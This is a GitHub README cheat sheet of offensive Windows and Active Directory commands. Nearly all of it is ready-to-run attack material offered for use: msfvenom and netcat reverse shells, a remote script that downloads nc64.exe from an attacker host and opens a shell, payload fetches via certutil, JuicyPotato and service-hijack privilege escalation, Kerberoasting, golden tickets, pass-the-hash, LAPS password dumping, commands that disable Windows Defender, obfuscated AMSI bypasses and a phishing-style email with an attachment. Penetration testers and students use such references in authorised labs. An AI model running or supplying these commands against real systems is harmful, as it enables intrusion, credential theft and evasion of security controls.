Skip to content

Evalle777/Windows-AD-attacking

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

69 Commits
 
 

Repository files navigation

Windows-AD-attacking

 

Any useful commands for Windows / Active Directory will be posted here 🛡️🔨

 

 

Shells

 

🪝 Creating your reverse/bind shells

 

[+] Create reverse shell using msfvenom

// Meterpreter

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.126 LPORT=443 -f exe > reverse.exe

// TCP

msfvenom -p  windows/shell/reverse_tcp LHOST=192.168.119.126 LPORT=443 -f exe > reverse.exe

 

[+] Reverse shell using NetCat

// In your Kali Linux machine:

nc -lnvp 443

// In the target's machine

nc.exe 192.168.13.37 443 -e cmd.exe

 

[+] Login by a specific user and get a shell using Netcat (Powershell)

$user = "hitman.corp\hitmanalharbi"
$pass = ConvertTo-SecureString -String "PASS123@!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList $user, $pass
Invoke-Command -ComputerName hitman-dc -Credential $cred -ScriptBlock {
	Invoke-WebRequest http://192.168.40.2/nc64.exe -OutFile C:\users\public\nc.exe;
	C:\users\public\nc.exe 192.168.40.2 443 -e cmd.exe
}

   

Transfer files

 

📂 Transfering and sharing files over the network

 

[+] Upload file using Powershell

powershell.exe $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest http://192.168.50.48/ASREPRoast.ps1 -OutFile C:\users\hitman\ASREPRoast.ps1

 

[+] Upload file using certutil.exe

certutil.exe -urlcache -f http://192.168.50.48/Rubeus.exe C:\users\hitman\Rubeus.exe

 

[+] Transfer files using powershell session (PSSesion)

$sess = New-PSSession -ComputerName ufc-webprod -Credential usfun\pastudent1337
Copy-Item -Path Invoke-Mimikatz.ps1 -Destination C:\users\public\Invoke-Mimikatz.ps1 -ToSession $sess
// You can use -FromSession to get files from session :D

 

[+] Transfer files using rdesktop tool (Available in Kali Linux)

// In Kali linux

mkdir /home/hitman/shared
rdesktop -f 192.168.50.48 -r disk:linux=/home/hitman/shared

// Now in Windows's RDP

Go to Network Places -> Entire Network -> Microsoft Terminal Services -> tsclient
and put your files there, you will find them in Kali too
Note: You can access the share \\tsclient directly too

 

[+] Transfer files using network shares (Powershell)

// You need to make a public share in your student's VM or your Kali

Copy-Item –Path \\PA-USER1337\scripts\nc64.exe –Destination 'C:\Users\jumpsrvadmin\Desktop\Diagnostics\nc.exe'

   

Privilege escalation

 

🧪 Escalating your privilege to the highest privileges

 

[+] Privilege escalation using juicy potato when you have SeImpersonatePrivilege privilege (Sometimes you need to attach CLSID)

JuicyPotato.exe -l 13373 -p c:\windows\system32\cmd.exe -a "/c c:/users/public/reverse.exe" -t *

 

[+] PowerUp.ps1 "Good powershell script for windows privilege escalation"

C:> powershell.exe -nop -exec bypass

PS C:\> Import-Module PowerUp.ps1

PS C:\> Invoke-AllChecks | Out-File -Encoding ASCII checks.txt

 

[+] Weak service permissions privilege escalation

// For example "Victim" is your current username

C:\Users\victim\Desktop>accesschk64 -uwcqv "victim" *

Accesschk v6.14 - Reports effective permissions for securable objects
Copyright ⌐ 2006-2021 Mark Russinovich
Sysinternals - www.sysinternals.com

RW SNMPTRAP
        SERVICE_ALL_ACCESS

// Check service

C:\Users\victim\Desktop>sc qc SNMPTRAP

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SNMPTRAP
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\System32\snmptrap.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SNMP Trap
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

// Change the binary path to your reverse shell or command

C:\Users\victim\Desktop>sc config SNMPTRAP binpath= "net localgroup administrators victim /add"
[SC] ChangeServiceConfig SUCCESS

C:\Users\victim\Desktop>sc config SNMPTRAP obj= ".\LocalSystem" password= ""

[SC] ChangeServiceConfig SUCCESS

// Stop and restart the service

C:\Users\victim\Desktop>sc start SNMPTRAP

 

[+] Search for unquoted service paths

// For exploitation check this article: https://www.ired.team/offensive-security/privilege-escalation/unquoted-service-paths

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

   

Kerberos

 

🏷️ Kerberos attacks like extract tickets and crack them or pass them

 

[+] Request a ticket for a specific SPN (powershell)

Add-Type -AssemblyName System.IdentityModel  
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLService/ufc-db1.us.funcorp.local"  

 

[+] Export all tickets using Mimikatz

mimikatz # kerberos::list /export  

 

[+] Crack a ticket using Tgsrepcrack.py (You can use john too or hashcat)

./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.hitmanalharbi.local~1433-boo.LOCAL.kirbi  

 

[+] Export all kerberastbles users to John format (Need PowerView.ps1)

Invoke-Kerberoast -OutputFormat john | Select-Object -ExpandProperty hash |% {$_.replace(':',':$krb5tgs$23$')}

 

[+] Kerberos Double-Hop problem (powershell)

$SecPassword = ConvertTo-SecureString 'YourSecretPassword1337' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('us.funcorp.local\pastudent1337', $SecPassword)
Invoke-Command -ComputerName UFC-JUMPSRV -Credential $cred -ScriptBlock {
    Invoke-Command -ComputerName UFC-WEBPROD -Credential $Using:cred -ScriptBlock {
		& cmd /c "hostname"    
    }
} 

 

[+] Create a golden ticket using Mimikatz

kerberos::golden /user:Hitman /domain:DOMAIN /sid:DOMAIN-SID /krbtgt:HASH /ticket:tgt /ptt

 

[+] Extract SPN/NTLM from keytab file (Linux)

// https://github.com/sosdave/KeyTabExtract

└─# python3 keytabextract.py sql.keytab      
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[!] Unable to identify any AES256-CTS-HMAC-SHA1 hashes.
[!] Unable to identify any AES128-CTS-HMAC-SHA1 hashes.
[+] Keytab File successfully imported.
        REALM : it.gcb.local
        SERVICE PRINCIPAL : sqlsvc/
        NTLM HASH : 7782dXXXXXXXXXXXXXXXXXXX :D

 

[+] Kerberos Resource-based Constrained Delegation (Need PowerMad and AD modules)

New-MachineAccount -Domain internal.msp.local -DomainController internal-dc01.internal.msp.local -MachineAccount attacker -Password (ConvertTo-SecureString 'Password123' -AsPlainText -Force) -Verbose
Set-ADComputer INTERNAL-BATCH -PrincipalsAllowedToDelegateToAccount attacker$ -Verbose
.\Rubeus.exe s4u /user:attacker$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /msdsspn:http/INTERNAL-BATCH /impersonateuser:Administrator /ptt

 

[+] DA to EA (Need Rubeus.exe)

kerberos::golden /domain:internal.msp.local /user:administrator /sid:S-1-5-21-2754435719-1041067879-922430489 /krbtgt:c5915aaXXXXXXXXX /sids:S-1-5-21-2998733414-582960673-4099777928-519 /ptt

   

Pass the hash

 

🕹️ Passing the hash for different services

 

[+] Pass the hash using pth-winexe (Available in Kali Linux)

pth-winexe -U USER%aad3b435b51404eeaad3b435b51404ee:USER_NTLM_HERE //IP cmd

 

[+] Access RDP using pass the hash (xfreerdp tool)

xfreerdp /u:username /pth:USER_NTLM_HERE /d:domain /v:IP

 

[+] Pass the hash using PsExec.py

python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:USER_NTLM_HERE anyuser@192.168.50.49

 

[+] Pass the hash using Mimikatz and run PowerShell

sekurlsa::pth /user:hitman /ntlm:4d8aa380635ded528e2cc8b0b96f3b06 /domain:hitman.corp /run:powershell.exe

   

Enumeration

 

🔍 Some commands about enumeration snd recon

 

[+] Get information about the current domain (Need PowerView.ps1)

Get-NetDomain

 

[+] Get all users in the domain (Need PowerView.ps1)

Get-NetUser | select samaccountname

 

[+] Get all computers in the domain (Need PowerView.ps1)

Get-NetComputer | select samaccountname, operatingsystem

 

[+] Get current domain's information (Active directory module)

Get-ADDomain

 

[+] Get current domain's users (Active directory module)

Get-ADUser -Filter * | Select SamAccountName

 

[+] Get current domain's computers (Active directory module)

Get-AdComputer -Filter * | select Name

 

[+] Get current domain's groups (Active directory module)

Get-ADGroup -Filter * | select name

 

[+] Get specific group's members (Active directory module)

Get-ADGroupMember -Identity "Administrators" -Recursive

 

[+] Get users & computer with specific properties, my favorite way to enumerate :D (Active directory module)

// Get users and some properties like passwordlastset to know when it changed and the description

Get-ADUser -filter * -properties passwordlastset,description | ft Name, passwordlastset, Description

// Get computer ...

Get-ADComputer -filter * -properties passwordlastset,description | ft Name, passwordlastset, Description

 

[+] Search for local admin access (Need PowerView.ps1)

// Get all computers from specific domain

$computers = Get-NetComputer -Domain hitman.msp.local

// Use Invoke-Command to check if you can execute command on them

Invoke-Command -ErrorAction SilentlyContinue -ScriptBlock{ hostname } -Computer ($computers.dnshostName)

 

[+] enum SMB shares using smbclient (Smbclient available in Kali Linux)

smbclient -L IP

 

[+] Sharphound command (For bloodhound)

// EXE version

./SharpHound.exe --CollectionMethod All

// Powershell version

Invoke-BloodHound -CollectionMethod All

 

[+] Find interesting ACLs for specific user (Need PowerView.ps1)

Invoke-ACLScanner -ResolveGUID | ? {$_.IdentityReferenceName -like "*jumpsrv*"}

 

[+] Find all ACLs for specific computer/group/user's SID (Need PowerView.ps1)

Get-ObjectAcl -ResolveGUIDs -Domain internal.msp.local | ? {$_.SecurityIdentifier -like "S-1-5-21-2754435719-1041067879-922430489-1118"}

 

[+] Discover domain's computers have unconstrained delegation (Need PowerView.ps1)

Get-DomainComputer -UnConstrained | select samaccountname

 

[+] Enumerate users/computers have contrained delegation enabled (Need PowerView.ps1)

// Users

Get-DomainUser -TrustedToAuth | select samaccountname, msds-allowedtodelegateto

// Computers

Get-Domaincomputer -TrustedToAuth | select samaccountname, msds-allowedtodelegateto

 

[+] Get specific domain SID (Need PowerView.ps1)

Get-DomainSID -Domain funcorp.local

 

[+] Find interesting ACLs in another domain (Need PowerView.ps1)

Find-InterestingDomainAcl -Domain TrustedForest.corp

 

[+] Get AppLocker rules/policies (Powershell)

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

 

[+] Displays a service's security descriptor (CMD)

// scmanager is the service's name, you can write any service 

sc sdshow scmanager

 

[+] Gets the capabilities of a specific user on a constrained session configuration (JEA)

Get-PSSessionCapability -ConfigurationName ITAccess -Username vanessa

   

MSSQL

 

📇 Some commands will help you in pentesting MSSQL

 

[+] Get list of sql servers on the domain (PowerUpSQL)

Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose 

 

[+] Execute a custom query (PowerUpSQL)

Get-SQLQuery -Instance AC-DBREPORT -Query "SELECT current_user"

 

[+] Execute a query to get the databases names (PowerUpSQL)

Get-SQLQuery -Instance msp-sqlreport -Query "SELECT name FROM master..sysdatabases;"

 

[+] Execute a query to get the tables from specific database (PowerUpSQL)

Get-SQLQuery -Instance msp-sqlreport -Query "SELECT name FROM DatabaseNameYouWant..sysobjects WHERE xtype = 'U';"

 

[+] Execute a query to get the linked servers (PowerUpSQL)

Get-SQLQuery -Instance msp-sqlreport -Query "exec sp_linkedservers;"

 

[+] Escalate the privileges (PowerUpSQL)

Invoke-SQLEscalatePriv -Verbose -Instance DBSERVER

 

[+] Crawl database links (PowerUpSQL)

Get-SqlServerLinkCrawl -Verbose -Instance UFC-SQLDEV

 

[+] Crawl database links and execute a custom query (PowerUpSQL)

 Get-SqlServerLinkCrawl -Verbose -Instance UFC-SQLDEV -Query "select current_user" 

 

[+] Enable XP_CMDSHELL (Any MSSQL client like HeidiSQL)

EXEC sp_configure 'show advanced options',1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE

   

LAPS

 

🔑 Local Administrator Password Solution (LAPS) commands, please install LAPS module: https://github.com/ztrhgf/LAPS

 

[+] Identifying if LAPS is installed in the current computer (Powershell)

Get-ChildItem 'c:\program files\LAPS\CSE\Admpwd.dll'

 

[+] Get domain's computers have LAPS (Need AD module)

Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'}

 

[+] Enumerate OUs LAPS is in use and which group/users can read the passwords (Need LAPS module)

PS C:\Users\itemployee14\Desktop\PS modules> Import-Module .\AdmPwd.PS\AdmPwd.PS.psd1
PS C:\Users\itemployee14\Desktop\PS modules> Find-AdmPwdExtendedRights -Identity *

Name                 DistinguishedName                                                 Status
----                 -----------------                                                 ------
Domain Controllers   OU=Domain Controllers,DC=gcb,DC=local                             Delegated
Domain Controllers   OU=Domain Controllers,DC=it,DC=gcb,DC=local                       Delegated
AppServers           OU=AppServers,DC=it,DC=gcb,DC=local                               Delegated
ITEmployees          OU=ITEmployees,DC=it,DC=gcb,DC=local                              Delegated
PreProd              OU=PreProd,DC=it,DC=gcb,DC=local                                  Delegated

PS C:\Users\itemployee14\Desktop\PS modules> Find-AdmPwdExtendedRights -Identity AppServers

ObjectDN                                      ExtendedRightHolders
--------                                      --------------------
OU=AppServers,DC=it,DC=gcb,DC=local           {NT AUTHORITY\SYSTEM, IT\Domain Admins, IT\LocalAdmins}

 

[+] Get all domain's computer and check LAPS for passwords (Need AD & LAPs modules)

PS C:\Users\itemployee14\Desktop\PS modules> get-adcomputer -filter * | get-admpwdpassword

ComputerName         DistinguishedName                             Password           ExpirationTimestamp
------------         -----------------                             --------           -------------------
IT-DC                CN=IT-DC,OU=Domain Controllers,DC=it,DC=gc...                    1/1/0001 12:00:00 AM
IT-PREPROD           CN=IT-PREPROD,OU=PreProd,DC=it,DC=gcb,DC=l...                    1/1/0001 12:00:00 AM
IT-SQLSRV02          CN=IT-SQLSRV02,CN=Computers,DC=it,DC=gcb,D...                    1/1/0001 12:00:00 AM
IT-APPSRV01          CN=IT-APPSRV01,OU=AppServers,DC=it,DC=gcb,...                    6/27/2019 5:45:32 AM
IT-TRACK01           CN=IT-TRACK01,CN=Computers,DC=it,DC=gcb,DC...                    1/1/0001 12:00:00 AM

 

[+] Get password from LAPS for a specific machine (Need AD module)

 Get-ADComputer -Identity it-appsrv01 -Properties ms-mcs-admpwd | select -ExpandProperty ms-mcs-admpwd

   

Security and policies

 

🔓 Bypass security, policies and AV evasion

 

[+] Bypass Powershell Execution Policy

// In Powershell you can write:

Set-ExecutionPolicy -ExecutionPolicy bypass

// or run powershell like this:

powershell.exe -ep bypass

 

[+] Disable windows defender

// Registry 

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1

// Powershell

powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true

 

[+] Powershell AMSI bypass

// Try this

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

// Or you can try this

[ReF]."`A$(echo sse)`mB$(echo L)`Y"."g`E$(echo tty)p`E"(( "Sy{3}ana{1}ut{4}ti{2}{0}ils" -f'iUt','gement.A',"on.Am`s",'stem.M','oma') )."$(echo ge)`Tf`i$(echo El)D"(("{0}{2}ni{1}iled" -f'am','tFa',"`siI"),("{2}ubl{0}`,{1}{0}" -f 'ic','Stat','NonP'))."$(echo Se)t`Va$(echo LUE)"($(),$(1 -eq 1))

 

[+] Bypass "Dot sourcing is not allowed" in PowerShell

// Write the call/code in a file

'Import-Module C:\allowedPath\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command "privilege::debug token::elevate" ' | Out-File -FilePath run.ps1

// Run file directly without dot source

.\run.ps1

   

Misc commands

 

⚡ Any misc or general command will be here

 

[+] Enable RDP and allow it in the firewall too

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=yes

 

[+] Port forwarding

netsh interface portproxy add v4tov4 listenport=2525 listenaddress=192.168.50.48 connectport=25 connectaddress=192.168.21.55
netsh advfirewall firewall add rule name=smtpfrwd dir=in action=allow protocol=TCP localport=2525

 

[+] Recursive files search (Powershell)

// Search for all txt files

Get-ChildItem -Path C:\ -Filter  *.txt -Recurse -ErrorAction SilentlyContinue -Force

// Search for flag.txt

Get-ChildItem -Path C:\ -Filter  flag.txt -Recurse -ErrorAction SilentlyContinue -Force

 

[+] Search for files in a specific date range (Powershell)

// If you want to search for folders or files without extensions, please remove (-include *.*)

Get-ChildItem -erroraction 'silentlycontinue' -recurse -include *.* -path C:\Users | ? {$_.lastwritetime -gt '10/10/2020' -AND $_.lastwritetime -lt '11/11/2020'}

 

[+] Encode and decode a file (Base64)

// Encode a file to base64

certutil -encode mail.exe encoded.txt

// Decode a base64 file

certutil -decode encoded.txt mail.exe

 

[+] Send a message with attachments (Powershell)

Send-MailMessage -From "user<[email protected]>" -To "lbunce<[email protected]>" -Subject "Check the important doc please" -SmtpServer 192.168.21.55 -Attachments .\doc.chm

 

[+] Get group or user by SID (Need AD module)

// AD Group 

Get-ADGroup -Identity S-1-5-21-948911695-1962824894-4291460450-1124

// AD Username

Get-ADUser -Identity S-1-5-21-948911695-1962824894-4291460450-26105

 

[+] Add a domain computer to different domain group (Need AD module)

// Group name and specify the domain

$group = Get-ADGroup -Identity 'DatabaseOwners' -Server 'alharbi.corp'

// Computer name and specify the domain ( You can change it to user by using "Get-ADUser")

$pc = Get-ADComputer -Identity 'hitman-pc01$' -Server 'hitman.corp'

// Add the computer to the group :D

Add-ADGroupMember -Identity $group -Members $pc

 

[+] Unzip compressed file (PowerShell)

Expand-Archive -Force ad.zip C:\users\public\ad

 

[+] Sniff network packets (PowerShell)

// Download the sniffer.ps1 from https://raw.githubusercontent.com/sperner/PowerShell/master/Sniffer.ps1

./sniffer.ps1 -LocalIP 192.168.4.111  -ScanIP 192.168.42.14 -Protocol tcp

   

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published